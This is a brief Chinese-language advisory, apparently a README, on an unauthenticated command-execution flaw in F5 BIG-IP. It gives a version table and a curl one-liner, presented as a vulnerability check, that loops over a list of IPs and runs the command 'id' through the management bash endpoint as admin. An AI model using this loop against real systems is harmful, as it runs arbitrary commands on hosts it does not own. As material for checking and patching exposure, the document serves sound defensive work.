
该漏洞可能允许未经身份验证的攻击者通过网络访问BIG-IP系统的管理端口和/或自IP地址,从而执行任意系统命令、创建或删除文件或禁用服务
您可以使用以下单行curl命令检查F5 Big-IP漏洞,或使用提供的Python脚本。
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
| 分支 | 受影响版本 | 修复版本 |
|---|---|---|
| 11.x | 11.6.1-11.6.5 | 无修复 |
| 12.x | 12.1.0-12.1.6 | 无修复 |
| 13.x | 13.1.0-13.1.4 | 13.1.5 |
| 14.x | 14.1.0-14.1.4 | 14.1.4.6 |
| 15.x | 15.1.0-15.1.5 | 15.1.5.1 |
| 16.x | 16.1.0-16.1.2 | 16.1.2.2 |
| 17.x | 无 | 17.0.0 |
有关缓解措施的更多信息,请参阅参考资料。